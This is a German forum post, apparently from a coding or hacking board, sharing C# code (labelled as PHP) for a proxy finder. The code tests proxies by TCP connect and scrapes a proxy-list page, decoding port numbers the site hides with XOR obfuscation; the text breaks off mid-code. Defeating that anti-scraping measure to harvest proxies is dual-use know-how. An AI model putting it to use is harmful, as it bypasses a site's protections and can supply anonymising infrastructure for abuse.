			<description>Aus meinem Client, tested and working.... 
Benutzt die Klasse Server aus der KNDeKaDeNz.Net. 
Solltet ihr diese nicht mit einbinden wollen, hier...</description>
			<content:encoded><![CDATA[<div>Aus meinem Client, tested and working....<br />
Benutzt die Klasse Server aus der KNDeKaDeNz.Net.<br />
Solltet ihr diese nicht mit einbinden wollen, hier nochmal der Source für die einzelne Klasse.<br />
<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;</span><span style="color: #007700">public&nbsp;class&nbsp;</span><span style="color: #0000BB">Server<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">Server</span><span style="color: #007700">(</span><span style="color: #0000BB">string&nbsp;host</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">int&nbsp;port</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">host&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">host</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">port&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">port</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">override&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">string&nbsp;ToString</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">host&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">":"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">port</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">string&nbsp;getHost</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">host</span><span style="color: #007700">;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">int&nbsp;getPort</span><span style="color: #007700">(){&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">port</span><span style="color: #007700">;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">string&nbsp;host</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">int&nbsp;port&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>[HIDE=50]<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Collections</span><span style="color: #007700">.</span><span style="color: #0000BB">Generic</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Linq</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Net</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">.</span><span style="color: #0000BB">RegularExpressions</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Threading</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Net</span><span style="color: #007700">.</span><span style="color: #0000BB">Sockets</span><span style="color: #007700">;<br /><br />namespace&nbsp;</span><span style="color: #0000BB">KNDeKaDeNz</span><span style="color: #007700">.</span><span style="color: #0000BB">Net<br /></span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;class&nbsp;</span><span style="color: #0000BB">ProxyFinder<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br /><br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">delegate&nbsp;void&nbsp;checkedProxyEvent</span><span style="color: #007700">(</span><span style="color: #0000BB">int&nbsp;state</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">event&nbsp;checkedProxyEvent&nbsp;checkedProxy</span><span style="color: #007700">;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;</span><span style="color: #0000BB">void&nbsp;checkProxy</span><span style="color: #007700">(</span><span style="color: #0000BB">Server&nbsp;p</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">int&nbsp;timeout</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;host&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">p</span><span style="color: #007700">.</span><span style="color: #0000BB">getHost</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;port&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">p</span><span style="color: #007700">.</span><span style="color: #0000BB">getPort</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;new&nbsp;</span><span style="color: #0000BB">Thread</span><span style="color: #007700">(</span><span style="color: #0000BB">delegate</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Socket&nbsp;socket&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Socket</span><span style="color: #007700">(</span><span style="color: #0000BB">AddressFamily</span><span style="color: #007700">.</span><span style="color: #0000BB">InterNetwork</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">SocketType</span><span style="color: #007700">.</span><span style="color: #0000BB">Stream</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ProtocolType</span><span style="color: #007700">.</span><span style="color: #0000BB">Tcp</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">socket</span><span style="color: #007700">.</span><span style="color: #0000BB">BeginConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">host</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">port</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">).</span><span style="color: #0000BB">AsyncWaitHandle</span><span style="color: #007700">.</span><span style="color: #0000BB">WaitOne</span><span style="color: #007700">(</span><span style="color: #0000BB">timeout</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">socket</span><span style="color: #007700">.</span><span style="color: #0000BB">Connected</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">checkedProxy</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">checkedProxy</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">socket</span><span style="color: #007700">.</span><span style="color: #0000BB">Close</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}).</span><span style="color: #0000BB">Start</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">void&nbsp;newSocks</span><span style="color: #007700">(</span><span style="color: #0000BB">object&nbsp;e</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">DownloadStringCompletedEventArgs&nbsp;a</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String&nbsp;src&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">a</span><span style="color: #007700">.</span><span style="color: #0000BB">Result</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dictionary</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">string</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">&gt;&nbsp;</span><span style="color: #0000BB">D&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Dictionary</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">string</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">&gt;();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Match&nbsp;C&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Regex</span><span style="color: #007700">.</span><span style="color: #0000BB">Match</span><span style="color: #007700">(</span><span style="color: #0000BB">src</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"(.*)BigBlind(.*)"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String&nbsp;t&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">C</span><span style="color: #007700">.</span><span style="color: #0000BB">Groups</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">0</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Value</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">&#91;&#93;&nbsp;</span><span style="color: #0000BB">acts&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">t</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">';'</span><span style="color: #007700">);<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">String&nbsp;act&nbsp;in&nbsp;acts</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">act</span><span style="color: #007700">.</span><span style="color: #0000BB">Trim</span><span style="color: #007700">()&nbsp;==&nbsp;</span><span style="color: #DD0000">""</span><span style="color: #007700">)&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;act2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">act</span><span style="color: #007700">.</span><span style="color: #0000BB">Trim</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">act2</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">'='</span><span style="color: #007700">)&#91;</span><span style="color: #0000BB">0</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Trim</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;value&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">act2</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">'='</span><span style="color: #007700">)&#91;</span><span style="color: #0000BB">1</span><span style="color: #007700">&#93;.</span><span style="color: #0000BB">Trim</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!</span><span style="color: #0000BB">value</span><span style="color: #007700">.</span><span style="color: #0000BB">Contains</span><span style="color: #007700">(</span><span style="color: #DD0000">'^'</span><span style="color: #007700">))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;v&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">value</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">.</span><span style="color: #0000BB">Add</span><span style="color: #007700">(</span><span style="color: #0000BB">key</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">v</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;v1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">'^'</span><span style="color: #007700">)&#91;</span><span style="color: #0000BB">0</span><span style="color: #007700">&#93;;&nbsp;</span><span style="color: #0000BB">int&nbsp;v1i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;v2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">'^'</span><span style="color: #007700">)&#91;</span><span style="color: #0000BB">1</span><span style="color: #007700">&#93;;&nbsp;</span><span style="color: #0000BB">int&nbsp;v2i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">v1i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">v1</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">v1i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">v1</span><span style="color: #007700">&#93;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">v2i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">int</span><span style="color: #007700">.</span><span style="color: #0000BB">Parse</span><span style="color: #007700">(</span><span style="color: #0000BB">v2</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">v2i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">v2</span><span style="color: #007700">&#93;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;v&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">v1i&nbsp;</span><span style="color: #007700">^&nbsp;</span><span style="color: #0000BB">v2i</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">v&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">bool&nbsp;lol2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">D</span><span style="color: #007700">.</span><span style="color: #0000BB">Add</span><span style="color: #007700">(</span><span style="color: #0000BB">key</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">v</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">src&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">src</span><span style="color: #007700">.</span><span style="color: #0000BB">Replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">""</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;host&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Regex</span><span style="color: #007700">.</span><span style="color: #0000BB">Match</span><span style="color: 